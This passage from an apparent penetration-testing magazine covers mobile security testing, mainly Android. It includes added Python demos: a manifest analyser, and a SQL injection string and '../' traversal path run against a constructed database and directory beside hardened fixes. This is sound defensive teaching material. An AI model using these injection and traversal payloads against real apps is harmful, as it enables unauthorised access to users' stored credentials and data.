Figure 7. Installation conrmation<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
No automatic redirection<br />
There are applications that do not redirect to web pages<br />
automatically. I recommend testing each QR reader that<br />
is downloaded to your iPhone. In order to perform the<br />
test you may use the QR code from this article (which<br />
may be QRjacked) or by generating a QR code to a<br />
URL.<br />
Decode QR<br />
There are many QR decoders; I use http://zxing.org/w/<br />
decode.jspx to validate the data of the code. If you don’t<br />
know the web site to which you are being referred to, it<br />
is recommended to avoid scanning the QR code from<br />
the iPhone.<br />
Control over-the-air (OTA) installation<br />
OTA installation should be used when a specific<br />
organization sends a link for installation. If the purpose<br />
of a QR code is software installation, Apple’s App Store<br />
should do it, unless it is discussed in advance with the<br />
publishing company.<br />
Conclusion<br />
QRbot is a concept of malicious software distribution<br />
and usage as botnet. In this article we have seen<br />
that combining social engineering with cyber-crime<br />
might lead to DDoS attacks and confidential personal<br />
information leakage. The QR botnet is only a PoC,<br />
however it might be used since the implementation of<br />
the attacks above is possible in short time. In order to<br />
avoid the attacks, users should be more aware to the<br />
risks and solutions for using secure QR readers and<br />
verify applications’ installation sources.<br />
NIR VALTMAN<br />
Nir Valtman is employed in Citadel Consulting<br />
LTD (http://en.citadel.co.il) as Chief Security<br />
Architect. Before this position he was<br />
working as senior technology consultant,<br />
Application security consultant, system<br />
security consultant and a technological<br />
trainer. As part of his positions, he was not only consulting, but also performed hands-on activities in various fields, e.g. hardening, penetration testing and development for personal/internal applications. Nir has a BSc in computer science<br />
but his knowledge is based mainly on cowboy learning and<br />
information sharing with the techno-oriented communities.<br />
As part of Nir’s position, he is responsible for investigating new technologies, delivering high-level technological surveys and<br />
business development in the company. Visit his blog: http://<br />
valtman-nir.blogspot.com or contact him: nirv@citadel.co.il.<br />
Page 10 http://pentestmag.com
Mobile Security Testing<br />
New technology brings with it new opportunities, for developers and for security consultants and penetration testers. Usually we find that new technology brings new opportunities to introduce vulnerabilities and with the mobile revolution we certainly aren’t short of them.<br />
With a new generation of mobile App developers, who have yet to be trained about secure coding practices on the new platforms, has come a wealth of vulnerabilities just waiting to be identified and exploited. The smartphone revolution hasn’t just caught businesses off guard, it has also exposed security testers who are often left without the knowledge or toolkits to be able to provide assurances about the security of the mobile platforms and applications they are testing. If you want to know more about how you can become part of the smartphone security testing revolution then read on!<br />
Introduction<br />
Before we get stuck into discussing how to go about security testing mobile platforms it’s worth looking at which ones you are likely to encounter if being asked to perform testing either for a client or for your own enjoyment. The major platforms are currently:<br />
• Google Android – This recently became the market leading mobile platform and is very popular with end users who run it on both phones and tablets. Android is an open source platform built on Linux; it is used on cheaper, lower-end devices and is also one of the easiest platforms to test for security vulnerabilities.<br />
• Apple iOS – The original smartphone platform that arguably started this whole revolution and the one-time market leader. iOS is a Unix-like platform derived from Mac OS X, designed to run only on Apple’s own phones and tablets, and there are several challenges associated with finding security vulnerabilities on it.<br />
• Microsoft Phone 7 – The new kid on the block as<br />
far as the major mobile platforms are concerned<br />
and Microsoft’s partnership with Nokia is certain<br />
to help its place in the market. Phone 7 is based<br />
on the Windows CE family although it is a closed<br />
platform with little information available about its<br />
security model.<br />
• RIM Blackberry OS – The current favourite of the corporate environment is the now ubiquitous Blackberry. Older devices run a proprietary Blackberry OS but newer incarnations, including the Playbook tablet, now run on top of a modified version of the QNX operating system, which provides more opportunity for interrogation of its security.<br />
There are a number of other smartphone platforms<br />
that you may encounter including Nokia’s Symbian<br />
and Palm’s WebOS which are now most likely confined<br />
to the annals of history. In this article we will focus<br />
on three of the platforms mentioned above with the<br />
majority of focus on the two market leaders.<br />
The Need for Testing<br />
Before we get stuck into the mechanics of testing<br />
mobile platforms for security vulnerabilities it is worth<br />
understanding why testing mobile applications and the<br />
platforms they sit on is important. Whereas in the past<br />
our phones were largely a static mass of code that let<br />
us make phone calls and send SMS messages they<br />
are now multifunction devices that run a dynamic set<br />
of applications with a complex ecosystem surrounding<br />
them. Whether you are interested in the security of an<br />
entire handset or tablet or just a single application there<br />
is now an extensive attack surface to consider.<br />
The implication of all this is that whether you are using a<br />
phone within a business or are releasing an App for your<br />
userbase you need to understand the risks that exist. Even if you are simply releasing an App to the public there are lots of risks to consider: does the application expose your user’s information, either to another App on the device or whilst in transit across a network? Does the application make the user’s entire phone more vulnerable to attack, thereby putting all their data at risk of compromise? If you need to find an answer to those<br />
questions you need to understand the security model of<br />
the platform in question and you need to perform some<br />
level of security testing or similar assurance activities.<br />
The Prerequisites for Testing<br />
If you are going to look at any mobile platform, just as with<br />
any other area of security testing or research, you need to<br />
have an environment you can use for your testing. There<br />
are effectively four things you will need for any platform<br />
although the ability to obtain all of these and the cost<br />
overhead associated with them will vary across platforms:<br />
Phone or tablet hardware<br />
There is nothing like the real deal with hardware to test<br />
out your findings on and to understand how the platform<br />
works in the real world. Whilst on some platforms you<br />
can get away with just using the emulator provided by the<br />
vendor you will find these often have less attack surface<br />
than the real device. Also, if your objective is to go out<br />
and find real world vulnerabilities before anyone else<br />
don’t underestimate the benefit of looking at code written<br />
by the OEMs before they ship their own hardware as this<br />
will be a rich source of bugs just waiting to be found.<br />
Development Environment and Compiler<br />
If you want to find and exploit vulnerabilities on the<br />
platforms it certainly pays to have a development<br />
environment and compiler available to you. One of the<br />
most common methods for exploiting vulnerabilities in<br />
mobile Apps is to write your own malicious App that can<br />
attack from the inside, and to do that you will need to either write or modify some code. On some platforms you will not be able to side-load your Apps without a special developer-unlocked device or publishing through the platform’s application store, but on many you will be able to write and run your own code.<br />
Emulator and Debugger<br />
Even if you have your own shiny hardware to play with<br />
you will find an emulator and debugging tools invaluable in<br />
your efforts to find and exploit security bugs. An emulator<br />
will give you freedom to experiment and debug to your<br />
heart’s content and in many cases will even let you test<br />
shellcode you can port directly to your hardware.<br />
Scripting language or interface<br />
In any form of security testing you will need your<br />
favourite scripting language close at hand. Whether it’s for some ad hoc fuzzing, sending some data over the<br />
network or delivering a payload for that remote code<br />
execution vulnerability you just found you can be sure<br />
that a scripting language will be your friend.<br />
Testing Mobile Platforms<br />
Whilst mobile platforms all have their own eccentricities and differences from the systems they evolved from, if you are going to understand the security model of a mobile platform you should first know about the Operating System it is built on. It’s not within the scope<br />
of this article to talk extensively about security testing<br />
against Linux, Windows CE or any of the other platforms<br />
that are the foundation of today’s mobile platforms. If<br />
you are going to be performing a mobile security test<br />
the area you will probably need most support with is in<br />
assessing the applications that run on top of the OS and<br />
most importantly how significant any vulnerabilities you<br />
find actually are. So my message is don’t overlook the<br />
security of the mobile platform itself but there are plenty<br />
of resources out there already and certainly don’t leave<br />
your standard tools behind if looking at this!<br />
One other thing to consider is the way the platform will<br />
be used in the environment it is destined for. You may<br />
be focussing on the OS and the Apps that run on top of it<br />
but there are much wider considerations. For example,<br />
is a corporate policy being enforced, is corporate and<br />
user data segregated, can data be pushed into a cloud<br />
based service and how are backups and other important<br />
admin tasks handled. Make sure you don’t forget about<br />
these when assessing any mobile platform or solution.<br />
With the platform covered off lets now get stuck into<br />
testing the mobile Apps themselves.<br />
Google Android Testing<br />
If you are looking for vulnerabilities in applications on<br />
any of the major mobile platforms it could be argued that<br />
Android is one of the easiest to find them in, if you know<br />
what to look for! The reason why is explained here:<br />
• Android SDK – Testing code on the Android emulator<br />
is very close to running code on the device itself and<br />
is very useful when hunting for bugs or trying out our<br />
exploits. The freely available SDK will provide you<br />
with everything you need to start looking at Android<br />
App security.<br />
• Android Packages – It is very easy to start examining<br />
an application for vulnerabilities, just grab the<br />
package file and off you go; lots of information will<br />
drop straight out at you without much investment of<br />
time or resources.<br />
• Developer Documentation – The current developer<br />
guides for the platform either do not contain or do<br />
not make clear enough the security considerations<br />
for developing on the platform. The result is a wealth<br />
of applications with vulnerabilities just waiting to be<br />
discovered.<br />
So just how would you perform a security test of an<br />
Android application then? To help you understand<br />
the platform I’ll give you a very quick introduction to<br />
it. Android is based on the Linux Operating System<br />
and uses its user privilege model to enforce a<br />
sandbox between different applications: each App is installed under its own Linux user ID. To enable communication between these sandboxed applications there is a kernel driver called the Binder that carries calls between an application and the Inter Process Communication (IPC) endpoints exported by each App developer. Any code exported through IPC will always execute under the privileges of the App that exposes it, not the App that calls it!<br />
Step 1 – Obtain the Android package that contains your application<br />
You will either have been provided with the package by<br />
the company you are performing a test for or you can<br />
always download and install it from the Marketplace.<br />
If the application is installed from the Android Market, you will be able to retrieve the application package file (APK) from the device using the standard Android SDK tools (adb). If downloading and installing, be sure to look at the permissions it requests, as this will be crucial to understanding its attack surface (you can then check these in the AndroidManifest.xml file, which we’ll discuss later). For example, if the App requests the INTERNET permission you know it’s likely to talk across the network!<br />
Step 2 – Unpack and grab the Android Manifest file<br />
Once you have grabbed the package file you can unpack its contents using your favourite unzip tool, as an APK is simply a zip archive. Inside you will find the compiled Dalvik bytecode (classes.dex), any native libraries and, most importantly, the AndroidManifest.xml file. Be aware that the manifest inside an APK is stored in a binary XML encoding, so decode it first, for example with aapt dump xmltree from the SDK or with apktool. It’s the manifest file that tells the package manager which permissions the application will need and also tells the Binder which IPC endpoints are going to be accessible and to whom. If you are lucky you may find vulnerabilities just by looking in this file! Keep an eye out for the android:debuggable and android:sharedUserId attributes, as these may indicate the first weaknesses.<br />
Step 3 – Examine the classes and any native code you have<br />
At this point it’s worth having a quick look through the<br />
other files you have in your package, these will include<br />
Java classes. Once you have converted the classes.dex<br />
file to standard java classes using a tool such as dex2jar,<br />
you can use your favourite Java decompiler to look<br />
inside. If you discover native C libraries, you may want to<br />
open them in your favourite disassembler, IDA Pro is the<br />
favourite for most of us, but be warned you will need the<br />
Advanced version if you want it to automatically handle<br />
the ARM processor it is most likely to be compiled for.<br />
At this point you may have already identified hard coded<br />
usernames, passwords or other security tokens embedded<br />
within the source or in your disassembled code. You will<br />
probably want to keep anything you discover in mind for<br />
the subsequent stages of the testing.<br />
Step 4 – Identify and test all exposed endpoints<br />
To protect an application from malicious Apps on the<br />
device it is important that the local attack surface is<br />
accurately enumerated. On the Android platform there<br />
are primarily four types of interface that will be exposed<br />
through the Android specific IPC interface and these are:<br />
• Services – These are similar to the concept of a<br />
service on other platforms and technologies, they<br />
are the workhorses of Apps and operate behind the<br />
scenes often never being directly visible to a user.<br />
• Activities – These are the visual parts of the App<br />
that a user will interact with, typically these will<br />
include menus and other controls for entering data<br />
or pressing on-screen buttons.<br />
• Broadcast Receivers – These are endpoints that<br />
other applications on the device can send data to,<br />
for example to tell the App user that a new SMS<br />
has arrived or that someone is calling the phone.<br />
• Content Providers – These are best viewed as data stores that hold information used by the App; they typically store data in local SQLite databases (yes, make sure you keep injection attacks in mind).<br />
With the exception of dynamically registered broadcast<br />
receivers, all of these endpoints will be defined in the<br />
AndroidManifest.xml file. This central App configuration<br />
file will also allow you to trace back the<br />
endpoints to the implementing java classes.<br />
In the next step you need to find out which of these endpoints are exported and thus accessible by other applications on the device. Content providers are the only endpoints that are exported by default, unless specified otherwise using the exported attribute (this default applies to Apps targeting Android versions before 4.2, API level 17; Apps targeting later levels have their providers private unless they say otherwise). For all the others the default behaviour is not to be exported unless explicitly exported using the exported attribute. Watch out for any intent-filters that may be assigned to these endpoints: once an intent-filter is defined, the endpoint is implicitly exported unless the exported attribute says otherwise.<br />
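As an added example (not code from the article, nor from MWR’s toolkit), here is a small Python script that applies the export rules above to a decoded manifest. It assumes the manifest has already been decoded to plain XML, for instance with apktool, since the copy inside an APK is binary-encoded; the sample manifest embedded in it is constructed for a hypothetical App, and its package, component and permission names are invented. It also takes into account a platform change that post-dates this article: content providers of Apps targeting API level 17 or above are no longer exported by default.<br />

```python
"""Added example: enumerate the local IPC attack surface from a decoded
AndroidManifest.xml, applying the export rules described in the article."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest for a hypothetical App; it is not taken from any
# real package and exists only to exercise each export rule once.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes" android:sharedUserId="com.example.shared">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="10"/>
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:debuggable="true">
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="false">
      <intent-filter><action android:name="com.example.notes.ADMIN"/></intent-filter>
    </activity>
    <service android:name=".SyncService"/>
    <receiver android:name=".SmsReceiver" android:exported="true"/>
    <provider android:name=".NotesProvider" android:authorities="com.example.notes"/>
    <provider android:name=".TokenProvider" android:authorities="com.example.tokens"
              android:exported="false"/>
  </application>
</manifest>
"""


def android_attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component, target_sdk):
    """Apply the platform defaults: an explicit android:exported wins; an
    intent-filter implies exported; otherwise only providers are exported by
    default, and only when the App targets an SDK below 17 (Android 4.2)."""
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit == "true"
    if component.find("intent-filter") is not None:
        return True
    return component.tag == "provider" and target_sdk < 17


def target_sdk_version(root):
    """targetSdkVersion defaults to minSdkVersion, which itself defaults to 1."""
    uses_sdk = root.find("uses-sdk")
    if uses_sdk is None:
        return 1
    target = android_attr(uses_sdk, "targetSdkVersion")
    minimum = android_attr(uses_sdk, "minSdkVersion")
    return int(target or minimum or 1)


def analyse_manifest(xml_text):
    """Return what a tester wants first: requested permissions, the weak
    attributes, and the (tag, name) components reachable from other Apps."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    target_sdk = target_sdk_version(root)
    report = {
        "package": root.get("package"),
        "target_sdk": target_sdk,
        "shared_user_id": android_attr(root, "sharedUserId"),
        "debuggable": android_attr(app, "debuggable") == "true",
        "permissions": [android_attr(p, "name") for p in root.findall("uses-permission")],
        "exported": [],
    }
    for component in app:
        if component.tag in COMPONENT_TAGS and is_exported(component, target_sdk):
            report["exported"].append((component.tag, android_attr(component, "name")))
    return report


if __name__ == "__main__":
    for key, value in analyse_manifest(SAMPLE_MANIFEST).items():
        print("%-15s %s" % (key, value))
```

Run against the sample, the script reports MainActivity (intent-filter), SmsReceiver (explicit) and NotesProvider (provider default) as reachable, while AdminActivity stays private despite its intent-filter because android:exported="false" overrides it. Point it at the decoded manifest of the App you are testing and the exported list becomes your worklist for the next step.<br />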
You should now be able to write some code that<br />
communicates with the exported IPC endpoints. This is<br />
where you will need to compile your own App and deploy<br />
it within the emulator or your own device to see how the<br />
endpoints respond when called. As far as vulnerability<br />
hunting goes you should be looking at all the classes of<br />
bug we have seen over the years. In other technologies<br />
we have largely seen the back of bugs such as directory<br />
traversal with ../../ and unexpected termination of<br />
strings with null bytes \x00 but it seems that these have<br />
also crept back into Android Apps.<br />
Another area that is ripe for security vulnerabilities is<br />
the content providers, do you remember that I mentioned<br />
they are storing data in SQL databases and that injection<br />
attacks should be considered. Unlike the majority of<br />
databases that are run on servers and desktops the<br />
mobile versions typically have interesting functionality<br />
such as file and system operations removed. Therefore,<br />
SQL injection typically only becomes an issue if there is<br />
data within the content provider that the methods are not<br />
providing access to. Using variations on SQL injection<br />
techniques discussed over the years it is often possible<br />
to read or write data in places you weren’t intended to by<br />
the developers. Content providers are also often used<br />
to allow other applications to access files that belong to<br />
the App you are looking at, this is where you regularly<br />
find directory traversal and similar vulnerabilities. As you<br />
can see the default export behaviour of content providers<br />
combined with SQL storage and file handling makes for<br />
an explosive mixture.<br />
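To make the two bug classes concrete, here is an added example (not from the article and not any real provider) that models, in Python with sqlite3 and a temporary directory, a query() method that splices the caller’s selection string into SQL and an openFile() that joins the URI path segment onto the App’s files directory, each next to a hardened form. The table, column and file names are constructed for the example; the Android provider API itself is not used, only the shape of the bug and of the fix.<br />

```python
"""Added example: the two content-provider bug classes from the article, each
modelled in Python with sqlite3 and the file system, beside a hardened form."""
import os
import sqlite3
import tempfile

# Columns the provider is meant to expose to other Apps (constructed).
PUBLIC_COLUMNS = ("id", "title")


def build_db():
    """Constructed sample database: a notes table other Apps may query and a
    tokens table that should never leave the App."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE notes(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE tokens(id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO notes(title, body) VALUES ('shopping', 'milk, eggs');
        INSERT INTO tokens(token) VALUES ('oauth-secret-123');
    """)
    return db


def query_vulnerable(db, selection):
    """Mirrors a query() that splices the caller's selection string into SQL."""
    sql = "SELECT title FROM notes WHERE (%s)" % selection
    return [row[0] for row in db.execute(sql)]


def query_hardened(db, column, value):
    """Only a whitelisted column may be filtered on, and the value is bound."""
    if column not in PUBLIC_COLUMNS:
        raise ValueError("column not exposed: %s" % column)
    sql = "SELECT title FROM notes WHERE %s = ?" % column
    return [row[0] for row in db.execute(sql, (value,))]


def make_app_dir():
    """Constructed App data directory: files/ is meant to be shared through the
    provider, shared_prefs/ holds credentials that are not."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "files"))
    os.makedirs(os.path.join(root, "shared_prefs"))
    with open(os.path.join(root, "files", "public.txt"), "wb") as f:
        f.write(b"hello")
    with open(os.path.join(root, "shared_prefs", "creds.xml"), "wb") as f:
        f.write(b'<string name="password">hunter2</string>')
    return os.path.join(root, "files")


def open_file_vulnerable(files_dir, name):
    """Mirrors an openFile() that joins the URI path segment onto files/."""
    with open(os.path.join(files_dir, name), "rb") as f:
        return f.read()


def open_file_hardened(files_dir, name):
    """Resolve the path and refuse anything that leaves files/ (covers ../ and
    absolute paths alike)."""
    base = os.path.realpath(files_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes files dir: %s" % name)
    with open(target, "rb") as f:
        return f.read()


def raises(exc, fn, *args):
    """True if fn(*args) raises exc; used to show the hardened paths refusing."""
    try:
        fn(*args)
    except exc:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    payload = "1=0) UNION SELECT token FROM tokens WHERE (1=1"
    print("injected:", query_vulnerable(db, payload))
    print("hardened:", query_hardened(db, "title", "shopping"))
    files_dir = make_app_dir()
    print("traversal:", open_file_vulnerable(files_dir, "../shared_prefs/creds.xml"))
    print("refused:", raises(PermissionError, open_file_hardened, files_dir, "../shared_prefs/creds.xml"))
```

The injected selection closes the bracket the provider opened, appends a UNION against the private table and re-opens a bracket so the trailing one still parses; no file or system functions are needed, just a second table the projection was never meant to reach. The traversal case is the same idea applied to paths: anything built from the URI has to be canonicalised and checked against the directory the provider is supposed to serve.<br />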
To perform rigorous testing of all these IPC endpoints<br />
you may need to write yourself some fuzzers or test<br />
case generators and examine the behaviour. Obviously<br />
if you have access to decompiled source it becomes<br />
much easier to spot bugs but if the App makes extensive<br />
use of native code libraries with any level of obfuscation<br />
or anti-reverse engineering built in you may find that the<br />
black box testing approach is a more efficient use of<br />
your time.<br />
Step 5 – Other Considerations<br />
You can now move on to looking at other classes of<br />
vulnerability although there unfortunately isn’t enough<br />
time to go in depth on these. The areas that you should<br />
take a look at are Unix file system permissions (yes world<br />
writable files still exist) and network communications. It<br />
is often the case that Apps communicate with external<br />
endpoints such as Web Services and either do this<br />
using cleartext HTTP or don’t check the certificate if<br />
using SSL and this is worth looking at. It’s also worth<br />
considering that vulnerabilities can exist in the web<br />
services themselves although that’s out of scope of our<br />
discussion.<br />
Unfortunately we can’t go into detail about all the<br />
classes of vulnerability that you may encounter on a<br />
security test of an Android application, we’ve looked<br />
at many and found a wide spectrum of issues from<br />
common classes of bug through to interesting logic<br />
flaws. To get you started though here is a list of the top<br />
ones that we encounter:<br />
• Unnecessary IPC endpoints that are exported<br />
• Exported content providers containing sensitive<br />
data<br />
• SQL Injection in content providers<br />
• Insecure data transmission across a network<br />
• Excessive application permissions<br />
• Hardcoded credentials<br />
• Weak or dangerous file system permissions<br />
• Directory traversal<br />
• Debuggable Apps<br />
You also have the world of memory corruption bugs<br />
in native code or the Java VM itself to look at and you<br />
can use other standard testing techniques to hunt for<br />
and exploit these types of security vulnerability.<br />
Another Approach to Android Testing<br />
The team of consultants here at MWR InfoSecurity is regularly called upon to examine the security of<br />
either a single application or an entire build of phone. In<br />
these situations the process of writing test harnesses,<br />
compiling code and deploying to the hardware or<br />
emulator can take up valuable time. We therefore<br />
looked at another approach where we built a testing<br />
toolkit that will run as an App on the phone (with minimal<br />
privileges) which you can talk to whilst the phone is<br />
tethered to a laptop.<br />
Figure 1. Android test platform<br />
This class of tool is very different from source code analysis, as it is aimed at being a practical platform for finding vulnerabilities and performing different attacks on Android devices. The main objective of a tool like this is to be a hybrid exploitation framework and auditing tool that can be used for many purposes. Some features which are particularly useful are:<br />
• The ease with which a user can find relevant<br />
information about exposed application attack vectors<br />
• Command-line interaction with applications on the<br />
device in order to find vulnerabilities<br />
• The ability to write proof-of-concept exploits<br />
for vulnerabilities using a range of pre-defined<br />
commands removing the need for custom application<br />
writing in order to perform tests against a target<br />
vulnerability<br />
The advantage of this approach is that you are<br />
able to obtain wide coverage across the phone and<br />
attempt exploitation without continually rebuilding and<br />
deploying code. The toolkit we developed at MWR<br />
is called Mercury and will soon be available so that<br />
security testers everywhere can benefit from the<br />
flexibility it brings to the testing process.<br />
The tool is still under development but it has already proven itself as a viable and scalable approach to security testing on the Android platform. As a teaser, here are a couple of screenshots of what you can expect (Figures 1 and 2).<br />
Figure 2. Commands<br />
Apple iOS Testing<br />
I will offer you a warning before you start considering<br />
auditing or testing an App that has been written for<br />
iOS, you won’t get very far without a Mac to help you!<br />
That isn’t an advert for Apple, it’s a reality check that<br />
developing for iOS is pretty near impossible without<br />
a Mac and performing security testing is going to be<br />
severely limited without one. When it comes to testing<br />
iPhone, iPod or iPad Apps you will be in one of two<br />
situations, you will have source code or you won’t. I’ll<br />
start with the case that you have source code as that<br />
is much easier and even if you do have it you will likely<br />
want to use elements of the black box approach as<br />
well.<br />
On iOS your source code review will focus on the<br />
same types of things as on any other type of code, the<br />
areas that handle user controlled data, control network<br />
activity and handle security tokens of any kind. To<br />
find vulnerabilities in iOS code you will need to know<br />
Objective C and have a good grasp of the types of poor<br />
coding practice that make more traditional C or C++<br />
applications vulnerable to attack.<br />
One of the most effective methods of homing in on<br />
bugs is to gauge what type of background the developer<br />
or developers have come from. They will typically be<br />
either more experienced coders who have encountered<br />
C or C++ but use the wrong bits of their knowledge<br />
and thereby introduce memory corruption bugs or<br />
developers who are new to programming and more<br />
likely to stick to Apple objective C libraries; however,<br />
are generally less experienced in secure programming.<br />
So no matter who has written the code you have a good<br />
chance of finding security bugs!<br />
The more complex part of testing an iOS application<br />
often comes when you are looking to test an App that<br />
you haven’t been given the source for. Often this occurs<br />
when an organisation wants some assurance about<br />
the security of an application they bought from a 3rd party where they are only provided with it in its compiled format, or when you just fancy taking a look at something from the App Store. In this situation, outside of playing with the application on the device and testing its advertised features, you need to get stuck in at the technical level. You will be able to follow a similar pattern for the analysis as with Android, except that iOS has no equivalent of Android’s exported IPC endpoints; custom URL schemes are the main way one App can be invoked by another, so check how the App handles the URLs passed to it. Be warned though, reverse engineering Objective-C is not easy! You may also need to consider jailbreaking the device, which you do at your own risk.<br />
If you want to put together a toolkit you should ideally<br />
include the following things:<br />
• A Mac<br />
• Xcode and other Mac development tools,<br />
Instruments on Mac OS/X is handy to have<br />
• The iOS Simulator that ships with Xcode (note that it is a simulator, not an emulator: it runs x86 builds of your App on the Mac, so native code behaves differently from the ARM device)<br />
• An iPhone, iPod Touch or iPad<br />
• IDA Pro for reverse engineering<br />
Maybe I’ll be able to give you some more detailed<br />
advice in the future but hopefully you can make a start<br />
with this!<br />
Microsoft Phone 7 Testing<br />
As mentioned at the start of this article the Phone 7<br />
platform is closed and the security model was only<br />
recently talked about publicly. If you would like to know<br />
more about the platform and how security is enforced<br />
then take a look at some of the research already<br />
conducted by Alex Plaskett of MWR InfoSecurity (http://labs.mwrinfosecurity.com/projectdetail.php?project=15). I would recommend that as the starting point for anyone who is interested in testing any aspect of the platform. On the Phone 7 platform all Apps run in very tightly confined chambers and developers are only able to use managed code in their Apps. In addition each App runs in its own sandbox within the Least Privileged Chamber (LPC) on the device, as illustrated in Figure 3.<br />
Figure 3. Security levels. The security levels and chambers in the Windows Phone 7 security model.<br />
Therefore, if you would like to test Apps on the platform<br />
I would suggest starting by looking at the permissions<br />
that are requested by the App to determine the exact<br />
attack surface you have available to you. Additionally,<br />
you can use tools like .Net Reflector to decompile the<br />
App although be warned that you may find it obfuscated<br />
and not easy to make progress with.<br />
One thing is certain, you should keep your eyes<br />
open for developments in the testing approach for this<br />
platform as more information could be released at any<br />
time.<br />
Conclusion<br />
It may be easy to categorise mobile technology as<br />
smartphone or tablets but it’s less easy to come up<br />
with a one size fits all approach when thinking about<br />
security testing. Each platform will require you to gain<br />
knowledge about its security features before you start<br />
your testing and you will also need to build up your<br />
toolkit which may require you to go out and buy some<br />
hardware and software. There are some free tools out<br />
there that can help you but as things stand you may be<br />
forced to dig into your pockets to buy some bits of kit.<br />
There are now mobile security testing courses<br />
starting to be run at the major security conferences<br />
but my advice would be to select one carefully before<br />
handing over your hard earned cash. If you want to use the knowledge gained to enable you to perform testing yourself you had better make sure you get a good teacher, as there is still an undiscovered world of security bugs out there and a checklist approach won’t enable you to catch them all. The most important advice<br />
I can offer you though is get stuck in and give mobile<br />
bug hunting a go as you are certain to see the rewards<br />
for your efforts!<br />
MARTYN RUKS<br />
Martyn Ruks is Technical Director at MWR InfoSecurity and has<br />
over 10 years experience in the information security testing<br />
and research fields. He has previously worked as a security<br />
tester and consultant across a wide range of projects that has<br />
provided him with a wealth of knowledge about how to test a<br />
variety of platforms for security vulnerabilities. Martyn is most<br />
well known for his research into IBM’s WebSphere MQ from<br />
which he created a testing methodology and toolkit for the<br />
platform. His previous research had centred around a number<br />
of the more exotic networking protocols and is now engaged<br />
on a retro research project in an attempt to find security bugs in<br />
networks of BBC Microcomputers from the 1980’s.<br />
Mounting a Mobile Masquerade?<br />
The sensitivity and value of data on mobile devices increasingly<br />
suggests the need for protection via some form of point-of-entry<br />
authentication. This article examines some of the methods that are available on current devices, and highlights some of the limitations that might be encountered when using them.<br />
It’s no exaggeration to suggest that mobile devices,<br />
and particularly smartphones, can now present highly<br />
valuable targets; not just because of their physical<br />
value but also thanks to the data that people are prone<br />
to storing on them. In addition to holding a wealth of<br />
personal data, they can increasingly provide a good level<br />
of access to company and corporate data (with things<br />
like email and contacts being chief amongst these).<br />
With such a valuable asset to be protected, this article<br />
examines the forms of protection that are available to<br />
thwart an impostor at the authentication level.<br />
Although mobile devices have offered authentication<br />
safeguards for many years, it is fair to say that many<br />
users have managed to ignore them. The reason here is<br />
often that they overlook the value and sensitivity of what<br />
they’re carrying around in data terms, and so similarly<br />
overlook the need to protect it. While the situation has<br />
improved with smartphones, there are still plenty of<br />
users whose security practices haven’t caught up with<br />
their technology usage. Indeed, if you ask an audience<br />
how many of them don’t use a PIN (or similar) to protect<br />
their mobile handset, a good number of hands normally<br />
go up. However, a fair few of the same hands also go<br />
up when asked whether their phone is holding data that<br />
they think ought to be protected.<br />
So, with users that don’t bother or don’t see the need to<br />
set a PIN, there are consequently many cases in which<br />
penetrating the device requires no more than physically<br />
acquiring it. Many users seem to assume that this is the<br />
very reason that they don’t need to worry about controlling<br />
access, because they intend to keep the device with them<br />
and consider that it is protected as a result. However,<br />
there’s significant evidence to show that mobiles are<br />
very much prone to loss and theft. For example, survey<br />
findings from CREDANT Technologies showed that,<br />
over a 12-month period, almost 4,400 smartphones and<br />
tablets were left behind in a cross-section of US airports<br />
(CREDANT. 2011. CREDANT Survey Finds Consumers<br />
Left Thousands of Laptops and Smartphones at Airports<br />
Across the United States, Press Release, 12 July 2011.<br />
http://www.credant.com/news-a-events/press-releases/<br />
238-credant-survey-finds-consumers-left-thousands-oflaptops-and-smart-phones-at-airports-across-the-unitedstates.html).<br />
Based on other survey findings, it’s then a<br />
fair bet that many of these would have been unprotected<br />
against further access.<br />
Even if a PIN is used, a 4-digit code is significantly<br />
less than we’d be encouraged to use in order to protect<br />
the same data elsewhere (e.g. on a desktop system).<br />
However, affording the same level of protection is<br />
less than straightforward. For example, while almost<br />
transparent to many users when they’re sitting at a full-size<br />
keyboard, entering a password can prove most<br />
unfriendly when you have to tap it in one-handed on<br />
a mobile device. The keys are small and fiddly, and<br />
can be particularly awkward if you’ve used a ‘strong’<br />
Page 18 http://pentestmag.com
password and then end up having to switch character<br />
sets to get the numbers and punctuation characters to<br />
appear. As a result, the relatively lengthy interaction<br />
required to enter the password may be too much<br />
effort to go through; particularly on a device that can<br />
be repeatedly going in and out of your pocket in order<br />
to perform quick tasks. In some cases, tapping in the<br />
password could end up taking longer than the thing you<br />
want to do. As a result, striking an acceptable balance<br />
between the protection and usability is actually quite a<br />
challenge to tackle.<br />
Predictably Insecure Numbers?<br />
The most common form of authentication on mobile<br />
devices has undoubtedly been based around Personal<br />
Identification Number (PIN) codes, with interfaces similar<br />
to Figure 1 dating back to the earliest handsets. However,<br />
for many users this has proven to be an unsatisfactory<br />
approach, with some finding it inconvenient to use and<br />
some considering it insufficient protection anyway. Add<br />
to these the folks that aren’t too fussed in the first place,<br />
and we have a variety of reasons why the available<br />
mechanism might not be used.<br />
Even if they use a PIN, there’s a fair chance that<br />
people aren’t using it particularly well, thanks to the<br />
opportunity to choose obvious and weak sequences.<br />
Research findings from Daniel Amitay help to put some<br />
numbers to this, based on a study of iPhone passcodes<br />
and the choices that users made (Amitay, D. 2011.<br />
